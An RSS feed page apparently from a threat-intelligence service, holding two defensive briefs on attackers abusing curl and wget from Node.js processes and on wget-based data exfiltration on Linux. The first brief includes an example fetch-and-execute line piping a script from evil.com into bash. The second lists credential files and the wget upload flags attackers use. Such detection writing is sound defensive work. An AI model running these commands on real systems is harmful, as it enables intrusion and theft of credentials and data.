<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Wget - CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/tags/wget/</link><description>Trending threats, MITRE ATT&amp;CK coverage, and detection metadata. Fed continuously.</description><generator>Hugo</generator><language>en</language><managingEditor>hello@craftedsignal.io</managingEditor><webMaster>hello@craftedsignal.io</webMaster><lastBuildDate>Tue, 30 Jan 2024 10:00:00 +0000</lastBuildDate><atom:link href="https://feed.craftedsignal.io/tags/wget/feed.xml" rel="self" type="application/rss+xml"/><item><title>Node.js Spawning Curl or Wget for Command and Control</title><link>https://feed.craftedsignal.io/briefs/2024-01-nodejs-curl-wget/</link><pubDate>Tue, 30 Jan 2024 10:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-nodejs-curl-wget/</guid><description>Detection of Node.js directly or via a shell spawning curl or wget, potentially indicating command and control behavior where adversaries download tools or payloads onto the system.</description><content:encoded><![CDATA[<p>This threat brief focuses on the detection of malicious activity where Node.js, a widely used JavaScript runtime environment, is leveraged to execute command-line tools like curl and wget. This activity can occur either directly or indirectly through a shell. Attackers may exploit Node.js applications to download and execute malicious payloads, effectively using the compromised application as a conduit for command and control (C2) operations. This behavior is particularly concerning because it can be masked under the guise of legitimate application activity, making it harder to detect. Defenders should be aware of Node.js processes spawning child processes, specifically curl or wget, and investigate further.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains initial access to a system either via exploiting a vulnerable Node.js application or compromising a server running Node.js.</li>
<li>The attacker leverages the <code>child_process</code> module in Node.js to execute system commands.</li>
<li>The attacker uses <code>child_process.exec</code>, <code>child_process.spawn</code>, or <code>child_process.execFile</code> to call a shell.</li>
<li>Within the shell, the attacker executes <code>curl</code> or <code>wget</code> to download a malicious payload from a remote server. The attacker may use flags such as <code>-sL</code> or <code>--insecure</code> to bypass security measures.</li>
<li>The downloaded payload is saved to a temporary directory like <code>/tmp</code>, <code>/var/tmp</code>, or <code>/dev/shm</code>.</li>
<li>The attacker may then execute the downloaded payload using a shell interpreter (e.g., <code>bash</code>, <code>sh</code>) by piping the output of <code>curl</code> or <code>wget</code> directly into the interpreter (e.g., <code>curl http://evil.com/payload.sh | bash</code>).</li>
<li>The executed payload establishes a reverse shell or performs other malicious activities, such as data exfiltration or lateral movement.</li>
<li>The attacker maintains persistence by creating cron jobs or systemd services that execute the malicious payload periodically.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation can lead to complete system compromise, data theft, and the establishment of a persistent foothold within the network. This can result in significant financial losses, reputational damage, and disruption of critical business operations. The use of Node.js makes detection difficult because it blends malicious activity with legitimate application behavior. The impact scales with the permissions of the account running the Node.js process.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Implement the provided Sigma rule to detect when Node.js spawns <code>curl</code> or <code>wget</code> processes and tune it for your environment.</li>
<li>Monitor process creation events and network connections originating from Node.js processes to identify suspicious behavior.</li>
<li>Enforce strict egress filtering to prevent Node.js applications from communicating with unauthorized external endpoints.</li>
<li>Regularly audit Node.js application dependencies for known vulnerabilities and ensure timely patching.</li>
<li>Use application sandboxing and privilege separation to limit the impact of potential compromises.</li>
<li>Implement integrity monitoring to detect unauthorized modifications to files and configurations.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>command_and_control</category><category>nodejs</category><category>curl</category><category>wget</category><category>initial_access</category></item><item><title>Potential Data Exfiltration via Wget on Linux Systems</title><link>https://feed.craftedsignal.io/briefs/2024-01-09-wget-data-exfiltration/</link><pubDate>Tue, 09 Jan 2024 10:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-09-wget-data-exfiltration/</guid><description>This rule detects the use of wget on Linux systems to upload files to an external server, a tactic commonly used for data exfiltration.</description><content:encoded><![CDATA[<p>This detection identifies the abuse of <code>wget</code> on Linux systems to exfiltrate data to external servers. Attackers may collect sensitive files, compress them, and then use <code>wget</code> with options such as <code>--post-file</code>, <code>--post-data</code>, or <code>--body-file</code> to transmit the data via HTTP/HTTPS. This activity, while not inherently malicious, becomes suspicious when combined with access to sensitive files or when observed in non-interactive sessions (e.g., cron jobs). The rule focuses on detecting unusual <code>wget</code> command-line arguments indicative of data exfiltration. This helps defenders identify potentially compromised systems where data is being stolen.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li><strong>Initial Access:</strong> Attacker gains access to the target Linux system through vulnerabilities, stolen credentials, or other means.</li>
<li><strong>Data Collection:</strong> Attacker identifies and collects sensitive files from various locations on the system, such as <code>/etc/passwd</code>, <code>/etc/shadow</code>, user SSH keys (<code>~/.ssh/*</code>), environment files (<code>*.env*</code>), and temporary directories (<code>/tmp/*</code>, <code>/var/tmp/*</code>).</li>
<li><strong>Staging:</strong> The collected files are often compressed into an archive (e.g., <code>loot.tar.gz</code>) and placed in a temporary directory, like <code>/tmp</code>.</li>
<li><strong>Command Construction:</strong> The attacker crafts a <code>wget</code> command to upload the staged data to a remote server. This command typically includes options like <code>--post-file</code>, <code>--post-data</code>, or <code>--body-file</code> to send the file content via HTTP POST.</li>
<li><strong>Exfiltration:</strong> The <code>wget</code> command is executed, sending the staged data to the attacker's command and control (C2) server.</li>
<li><strong>Cleanup (Optional):</strong> The attacker may attempt to delete the staged archive and any associated scripts to cover their tracks.</li>
<li><strong>Persistence (Optional):</strong> The attacker may schedule the exfiltration process via cron jobs or systemd timers to automate the data theft.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>A successful attack can result in the exfiltration of sensitive data, including credentials, configuration files, source code, and customer data. The severity of the impact depends on the nature of the exfiltrated data. Compromised credentials can lead to further unauthorized access to internal systems. Leaked source code can expose vulnerabilities. Stolen customer data can result in financial losses and reputational damage.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule &quot;Potential Data Exfiltration Through Wget&quot; to your SIEM to detect suspicious <code>wget</code> commands (see <code>rules</code> section).</li>
<li>Enable process creation logging with command-line arguments on Linux systems to capture the full <code>wget</code> command lines (reference: <code>logsource</code>).</li>
<li>Investigate any alerts generated by the Sigma rule by examining the process tree, user context, and destination endpoint to determine legitimacy.</li>
<li>Implement network monitoring to detect unusual outbound HTTP/HTTPS traffic, especially POST requests to unfamiliar destinations.</li>
<li>Harden Linux systems by restricting the use of <code>wget</code> where it is not necessary and enforcing SELinux/AppArmor policies to limit its capabilities (reference: setup section).</li>
<li>Regularly review and audit cron jobs and systemd timers for suspicious entries that could be used for automated data exfiltration.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>exfiltration</category><category>wget</category><category>linux</category><category>data-theft</category></item></channel></rss>